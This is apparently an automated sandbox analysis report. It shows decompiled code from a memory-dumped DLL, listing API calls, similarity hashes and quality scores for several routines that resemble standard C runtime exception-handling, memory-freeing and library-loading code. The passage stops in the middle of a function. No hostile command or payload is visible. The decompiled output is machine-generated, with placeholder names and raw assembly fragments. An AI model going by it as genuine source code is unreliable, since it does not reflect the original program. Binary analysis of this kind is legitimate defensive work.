                                                                                                                                                                                                                                				_t59 = __esi;
                                                                                                                                                                                                                                				_t58 = __edi;
                                                                                                                                                                                                                                				_t57 = __edx;
                                                                                                                                                                                                                                				if(IsProcessorFeaturePresent(0x17) != 0) {
                                                                                                                                                                                                                                					_t55 = _a4;
                                                                                                                                                                                                                                					asm("int 0x29");
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7808(_t34);
                                                                                                                                                                                                                                				 *_t60 = 0x2cc;
                                                                                                                                                                                                                                				_v632 = E736D7DE0(_t58,  &_v808, 0, 3);
                                                                                                                                                                                                                                				_v636 = _t55;
                                                                                                                                                                                                                                				_v640 = _t57;
                                                                                                                                                                                                                                				_v644 = _t51;
                                                                                                                                                                                                                                				_v648 = _t59;
                                                                                                                                                                                                                                				_v652 = _t58;
                                                                                                                                                                                                                                				_v608 = ss;
                                                                                                                                                                                                                                				_v620 = cs;
                                                                                                                                                                                                                                				_v656 = ds;
                                                                                                                                                                                                                                				_v660 = es;
                                                                                                                                                                                                                                				_v664 = fs;
                                                                                                                                                                                                                                				_v668 = gs;
                                                                                                                                                                                                                                				asm("pushfd");
                                                                                                                                                                                                                                				_pop( *_t15);
                                                                                                                                                                                                                                				_v624 = _v0;
                                                                                                                                                                                                                                				_t39 =  &_v0;
                                                                                                                                                                                                                                				_v612 = _t39;
                                                                                                                                                                                                                                				_v808 = 0x10001;
                                                                                                                                                                                                                                				_v628 =  *((intOrPtr*)(_t39 - 4));
                                                                                                                                                                                                                                				E736D7DE0(_t58,  &_v92, 0, 0x50);
                                                                                                                                                                                                                                				_v92 = 0x40000015;
                                                                                                                                                                                                                                				_v88 = 1;
                                                                                                                                                                                                                                				_v80 = _v0;
                                                                                                                                                                                                                                				_t28 = IsDebuggerPresent() - 1; // -1
                                                                                                                                                                                                                                				_v12.ExceptionRecord =  &_v92;
                                                                                                                                                                                                                                				asm("sbb bl, bl");
                                                                                                                                                                                                                                				_v12.ContextRecord =  &_v808;
                                                                                                                                                                                                                                				_t54 =  ~_t28 + 1;
                                                                                                                                                                                                                                				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                				_t49 = UnhandledExceptionFilter( &_v12);
                                                                                                                                                                                                                                				if(_t49 == 0 && _t54 == 0) {
                                                                                                                                                                                                                                					_push(3);
                                                                                                                                                                                                                                					return E736D7808(_t49);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t49;
                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 736D76F9
                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 736D77C5
                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 736D77E5
                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 736D77EF
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                                                                                • Opcode ID: d8b21c1d49af95862d877ddde23a62b198ce3d32311daa61e51ea799fbd8205c
                                                                                                                                                                                                                                • Instruction ID: ba578deb28372b94fd4a343730852cda3a5210a302ad2b2cb0f2fc68afcb84f1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8b21c1d49af95862d877ddde23a62b198ce3d32311daa61e51ea799fbd8205c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD3106B5D512189BDF11DFA5C989BCCBBB8BF08305F1040EAE40DAB280EB715A88DF45
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DC947(intOrPtr _a4) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				intOrPtr _t25;
                                                                                                                                                                                                                                				intOrPtr* _t26;
                                                                                                                                                                                                                                				intOrPtr _t28;
                                                                                                                                                                                                                                				intOrPtr* _t29;
                                                                                                                                                                                                                                				intOrPtr* _t31;
                                                                                                                                                                                                                                				intOrPtr* _t45;
                                                                                                                                                                                                                                				intOrPtr* _t46;
                                                                                                                                                                                                                                				intOrPtr* _t47;
                                                                                                                                                                                                                                				intOrPtr* _t55;
                                                                                                                                                                                                                                				intOrPtr* _t70;
                                                                                                                                                                                                                                				intOrPtr _t74;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t74 = _a4;
                                                                                                                                                                                                                                				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                                                                                                                                                                                                				if(_t25 != 0 && _t25 != 0x736eb6f8) {
                                                                                                                                                                                                                                					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                                                                                                                                                                                                					if(_t45 != 0 &&  *_t45 == 0) {
                                                                                                                                                                                                                                						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                                                                                                                                                                                                						if(_t46 != 0 &&  *_t46 == 0) {
                                                                                                                                                                                                                                							E736DA293(_t46);
                                                                                                                                                                                                                                							E736DE879( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                                                                                                                                                                                                						if(_t47 != 0 &&  *_t47 == 0) {
                                                                                                                                                                                                                                							E736DA293(_t47);
                                                                                                                                                                                                                                							E736DE977( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						E736DA293( *((intOrPtr*)(_t74 + 0x7c)));
                                                                                                                                                                                                                                						E736DA293( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                                                                                                                                                                                                				if(_t26 != 0 &&  *_t26 == 0) {
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                                                                                                                                                                                                					E736DA293( *((intOrPtr*)(_t74 + 0x8c)));
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736DCABA( *((intOrPtr*)(_t74 + 0x9c)));
                                                                                                                                                                                                                                				_t28 = 6;
                                                                                                                                                                                                                                				_t55 = _t74 + 0xa0;
                                                                                                                                                                                                                                				_v8 = _t28;
                                                                                                                                                                                                                                				_t70 = _t74 + 0x28;
                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                					if( *((intOrPtr*)(_t70 - 8)) != 0x736eb640) {
                                                                                                                                                                                                                                						_t31 =  *_t70;
                                                                                                                                                                                                                                						if(_t31 != 0 &&  *_t31 == 0) {
                                                                                                                                                                                                                                							E736DA293(_t31);
                                                                                                                                                                                                                                							E736DA293( *_t55);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t28 = _v8;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                                                                                                                                                                                                						_t22 = _t70 - 4; // 0xfffffe87
                                                                                                                                                                                                                                						_t29 =  *_t22;
                                                                                                                                                                                                                                						if(_t29 != 0 &&  *_t29 == 0) {
                                                                                                                                                                                                                                							E736DA293(_t29);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t28 = _v8;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t55 = _t55 + 4;
                                                                                                                                                                                                                                					_t70 = _t70 + 0x10;
                                                                                                                                                                                                                                					_t28 = _t28 - 1;
                                                                                                                                                                                                                                					_v8 = _t28;
                                                                                                                                                                                                                                				} while (_t28 != 0);
                                                                                                                                                                                                                                				return E736DA293(_t74);
                                                                                                                                                                                                                                			}
















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 736DC98B
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE896
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8A8
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8BA
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8CC
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8DE
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE8F0
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE902
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE914
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE926
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE938
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE94A
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE95C
                                                                                                                                                                                                                                  • Part of subcall function 736DE879: _free.LIBCMT ref: 736DE96E
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC980
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: HeapFree.KERNEL32(00000000,00000000,?,736D94E3), ref: 736DA2A9
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: GetLastError.KERNEL32(?,?,736D94E3), ref: 736DA2BB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9A2
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9B7
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9C2
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9E4
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DC9F7
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA05
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA10
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA48
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA4F
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA6C
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DCA84
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                                                                • Opcode ID: 599145fed85b74f97974adef1213f49baa61baba2e9bbbcd209e31af3497c3dc
                                                                                                                                                                                                                                • Instruction ID: f74a755e22aef0896a9b5fa408a0da64e454c7f0919e4df320d9c99cfb1a0f4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 599145fed85b74f97974adef1213f49baa61baba2e9bbbcd209e31af3497c3dc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D315E31A247089FEF129B7ADA40B5673F9BF00710F18452EE49BDB2D0DE75EA508798
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                			E736D9B4D(void* __ebx, void* __edi, void* __esi, char _a4) {
                                                                                                                                                                                                                                				void* _v5;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                				void* __ebp;
                                                                                                                                                                                                                                				char _t55;
                                                                                                                                                                                                                                				char _t61;
                                                                                                                                                                                                                                				void* _t67;
                                                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                                                				void* _t72;
                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t73 = __esi;
                                                                                                                                                                                                                                				_t72 = __edi;
                                                                                                                                                                                                                                				_t67 = __ebx;
                                                                                                                                                                                                                                				_t36 = _a4;
                                                                                                                                                                                                                                				_t68 =  *_a4;
                                                                                                                                                                                                                                				_t77 = _t68 - 0x736e1c18;
                                                                                                                                                                                                                                				if(_t68 != 0x736e1c18) {
                                                                                                                                                                                                                                					E736DA293(_t68);
                                                                                                                                                                                                                                					_t36 = _a4;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_t36 + 0x3c)));
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_a4 + 0x30)));
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_a4 + 0x34)));
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_a4 + 0x38)));
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_a4 + 0x2c)));
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_a4 + 0x40)));
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_a4 + 0x44)));
                                                                                                                                                                                                                                				E736DA293( *((intOrPtr*)(_a4 + 0x360)));
                                                                                                                                                                                                                                				_v16 =  &_a4;
                                                                                                                                                                                                                                				_t55 = 5;
                                                                                                                                                                                                                                				_v12 = _t55;
                                                                                                                                                                                                                                				_v20 = _t55;
                                                                                                                                                                                                                                				_push( &_v12);
                                                                                                                                                                                                                                				_push( &_v16);
                                                                                                                                                                                                                                				_push( &_v20);
                                                                                                                                                                                                                                				E736D9995(_t67, _t72, _t73, _t77);
                                                                                                                                                                                                                                				_v16 =  &_a4;
                                                                                                                                                                                                                                				_t61 = 4;
                                                                                                                                                                                                                                				_v20 = _t61;
                                                                                                                                                                                                                                				_v12 = _t61;
                                                                                                                                                                                                                                				_push( &_v20);
                                                                                                                                                                                                                                				_push( &_v16);
                                                                                                                                                                                                                                				_push( &_v12);
                                                                                                                                                                                                                                				return E736D99F6(_t67, _t72, _t73, _t77);
                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: b2104281d2ac88f722911caa39a1f6584bc094eab3d65222d621271814a61400
                                                                                                                                                                                                                                • Instruction ID: ddb1edd4f9ed18cc31756fd0c7bb6d8f5c25aa08bd4ac0d45db7d741bc4a5af1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2104281d2ac88f722911caa39a1f6584bc094eab3d65222d621271814a61400
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A21DD76D54208AFDF02DF95C940EDE7BB9BF08600F0445A9F5099B260EB76DB54CB84
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                			E736D7B00(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                				char _v5;
                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				char _t53;
                                                                                                                                                                                                                                				signed int _t60;
                                                                                                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                				intOrPtr* _t63;
                                                                                                                                                                                                                                				intOrPtr _t65;
                                                                                                                                                                                                                                				intOrPtr* _t66;
                                                                                                                                                                                                                                				intOrPtr* _t69;
                                                                                                                                                                                                                                				intOrPtr* _t73;
                                                                                                                                                                                                                                				intOrPtr _t74;
                                                                                                                                                                                                                                				signed int _t78;
                                                                                                                                                                                                                                				char _t80;
                                                                                                                                                                                                                                				intOrPtr _t91;
                                                                                                                                                                                                                                				intOrPtr _t94;
                                                                                                                                                                                                                                				intOrPtr* _t96;
                                                                                                                                                                                                                                				intOrPtr* _t98;
                                                                                                                                                                                                                                				void* _t99;
                                                                                                                                                                                                                                				void* _t102;
                                                                                                                                                                                                                                				void* _t103;
                                                                                                                                                                                                                                				void* _t110;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t87 = __edx;
                                                                                                                                                                                                                                				_push(__ebx);
                                                                                                                                                                                                                                				_t73 = _a4;
                                                                                                                                                                                                                                				_push(__edi);
                                                                                                                                                                                                                                				_v5 = 0;
                                                                                                                                                                                                                                				_v16 = 1;
                                                                                                                                                                                                                                				 *_t73 = E736E0D60(__ecx,  *_t73);
                                                                                                                                                                                                                                				_t74 = _a8;
                                                                                                                                                                                                                                				_t6 = _t74 + 0x10; // 0x11
                                                                                                                                                                                                                                				_t94 = _t6;
                                                                                                                                                                                                                                				_push(_t94);
                                                                                                                                                                                                                                				_v20 = _t94;
                                                                                                                                                                                                                                				_v12 =  *(_t74 + 8) ^  *0x736eb004;
                                                                                                                                                                                                                                				E736D7AC0(_t74, __edx, __edi, _t94,  *(_t74 + 8) ^  *0x736eb004);
                                                                                                                                                                                                                                				E736D80A7(_a12);
                                                                                                                                                                                                                                				_t53 = _a4;
                                                                                                                                                                                                                                				_t103 = _t102 + 0x10;
                                                                                                                                                                                                                                				_t91 =  *((intOrPtr*)(_t74 + 0xc));
                                                                                                                                                                                                                                				if(( *(_t53 + 4) & 0x00000066) != 0) {
                                                                                                                                                                                                                                					__eflags = _t91 - 0xfffffffe;
                                                                                                                                                                                                                                					if(_t91 != 0xfffffffe) {
                                                                                                                                                                                                                                						_t87 = 0xfffffffe;
                                                                                                                                                                                                                                						E736D8090(_t74, 0xfffffffe, _t94, 0x736eb004);
                                                                                                                                                                                                                                						goto L13;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L14;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_v32 = _t53;
                                                                                                                                                                                                                                					_v28 = _a12;
                                                                                                                                                                                                                                					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
                                                                                                                                                                                                                                					if(_t91 == 0xfffffffe) {
                                                                                                                                                                                                                                						L14:
                                                                                                                                                                                                                                						return _v16;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                							_t78 = _v12;
                                                                                                                                                                                                                                							_t60 = _t91 + (_t91 + 2) * 2;
                                                                                                                                                                                                                                							_t74 =  *((intOrPtr*)(_t78 + _t60 * 4));
                                                                                                                                                                                                                                							_t61 = _t78 + _t60 * 4;
                                                                                                                                                                                                                                							_t79 =  *((intOrPtr*)(_t61 + 4));
                                                                                                                                                                                                                                							_v24 = _t61;
                                                                                                                                                                                                                                							if( *((intOrPtr*)(_t61 + 4)) == 0) {
                                                                                                                                                                                                                                								_t80 = _v5;
                                                                                                                                                                                                                                								goto L7;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t87 = _t94;
                                                                                                                                                                                                                                								_t62 = E736D8030(_t79, _t94);
                                                                                                                                                                                                                                								_t80 = 1;
                                                                                                                                                                                                                                								_v5 = 1;
                                                                                                                                                                                                                                								_t110 = _t62;
                                                                                                                                                                                                                                								if(_t110 < 0) {
                                                                                                                                                                                                                                									_v16 = 0;
                                                                                                                                                                                                                                									L13:
                                                                                                                                                                                                                                									_push(_t94);
                                                                                                                                                                                                                                									E736D7AC0(_t74, _t87, _t91, _t94, _v12);
                                                                                                                                                                                                                                									goto L14;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									if(_t110 > 0) {
                                                                                                                                                                                                                                										_t63 = _a4;
                                                                                                                                                                                                                                										__eflags =  *_t63 - 0xe06d7363;
                                                                                                                                                                                                                                										if( *_t63 == 0xe06d7363) {
                                                                                                                                                                                                                                											__eflags =  *0x736e115c;
                                                                                                                                                                                                                                											if(__eflags != 0) {
                                                                                                                                                                                                                                												_t69 = E736E0C00(__eflags, 0x736e115c);
                                                                                                                                                                                                                                												_t103 = _t103 + 4;
                                                                                                                                                                                                                                												__eflags = _t69;
                                                                                                                                                                                                                                												if(_t69 != 0) {
                                                                                                                                                                                                                                													_t98 =  *0x736e115c; // 0x736d7cd5
                                                                                                                                                                                                                                													 *0x736e1104(_a4, 1);
                                                                                                                                                                                                                                													 *_t98();
                                                                                                                                                                                                                                													_t94 = _v20;
                                                                                                                                                                                                                                													_t103 = _t103 + 8;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                												_t63 = _a4;
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										_t88 = _t63;
                                                                                                                                                                                                                                										E736D8070(_t63, _a8, _t63);
                                                                                                                                                                                                                                										_t65 = _a8;
                                                                                                                                                                                                                                										__eflags =  *((intOrPtr*)(_t65 + 0xc)) - _t91;
                                                                                                                                                                                                                                										if( *((intOrPtr*)(_t65 + 0xc)) != _t91) {
                                                                                                                                                                                                                                											_t88 = _t91;
                                                                                                                                                                                                                                											E736D8090(_t65, _t91, _t94, 0x736eb004);
                                                                                                                                                                                                                                											_t65 = _a8;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										 *((intOrPtr*)(_t65 + 0xc)) = _t74;
                                                                                                                                                                                                                                										_t66 = E736D7AC0(_t74, _t88, _t91, _t94, _v12);
                                                                                                                                                                                                                                										E736D8050();
                                                                                                                                                                                                                                										asm("int3");
                                                                                                                                                                                                                                										__imp__InterlockedFlushSList(_v40, _t99, _t94);
                                                                                                                                                                                                                                										__eflags = _t66;
                                                                                                                                                                                                                                										if(_t66 != 0) {
                                                                                                                                                                                                                                											_push(_t94);
                                                                                                                                                                                                                                											do {
                                                                                                                                                                                                                                												_t96 =  *_t66;
                                                                                                                                                                                                                                												E736D9721(_t66);
                                                                                                                                                                                                                                												_t66 = _t96;
                                                                                                                                                                                                                                												__eflags = _t96;
                                                                                                                                                                                                                                											} while (_t96 != 0);
                                                                                                                                                                                                                                											return _t66;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										return _t66;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										goto L7;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L28;
                                                                                                                                                                                                                                							L7:
                                                                                                                                                                                                                                							_t91 = _t74;
                                                                                                                                                                                                                                						} while (_t74 != 0xfffffffe);
                                                                                                                                                                                                                                						if(_t80 != 0) {
                                                                                                                                                                                                                                							goto L13;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L14;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				L28:
                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                0x736d7ba0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7ba2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7ba0
                                                                                                                                                                                                                                0x736d7b65
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 736D7B37
                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 736D7B3F
                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 736D7BC8
                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 736D7BF3
                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 736D7C48
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                • Opcode ID: 66f1588521dea7596ca4f86922c0d2a69bbbe13f2ce21ad89abd3555ab6018f5
                                                                                                                                                                                                                                • Instruction ID: 06bcfdb3823eca6632ae82424dedac963ae3f8a898a7b5a53310191a76ef24ed
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66f1588521dea7596ca4f86922c0d2a69bbbe13f2ce21ad89abd3555ab6018f5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1741A234A10218AFCF00DF69C984B9EBFB5FF45324F148595E81A9B3D1D731AA05CB96
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DB9A8(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                				signed int* _v8;
                                                                                                                                                                                                                                				void** _t12;
                                                                                                                                                                                                                                				void* _t16;
                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                				signed int _t22;
                                                                                                                                                                                                                                				WCHAR* _t23;
                                                                                                                                                                                                                                				void** _t26;
                                                                                                                                                                                                                                				signed int* _t29;
                                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t29 = _a4;
                                                                                                                                                                                                                                				while(_t29 != _a8) {
                                                                                                                                                                                                                                					_t22 =  *_t29;
                                                                                                                                                                                                                                					_t12 = 0x736efa08 + _t22 * 4;
                                                                                                                                                                                                                                					_t32 =  *_t12;
                                                                                                                                                                                                                                					_v8 = _t12;
                                                                                                                                                                                                                                					if(_t32 == 0) {
                                                                                                                                                                                                                                						_t23 =  *(0x736e1f08 + _t22 * 4);
                                                                                                                                                                                                                                						_t32 = LoadLibraryExW(_t23, 0, 0x800);
                                                                                                                                                                                                                                						if(_t32 != 0) {
                                                                                                                                                                                                                                							L12:
                                                                                                                                                                                                                                							_t26 = _v8;
                                                                                                                                                                                                                                							 *_t26 = _t32;
                                                                                                                                                                                                                                							if( *_t26 != 0) {
                                                                                                                                                                                                                                								FreeLibrary(_t32);
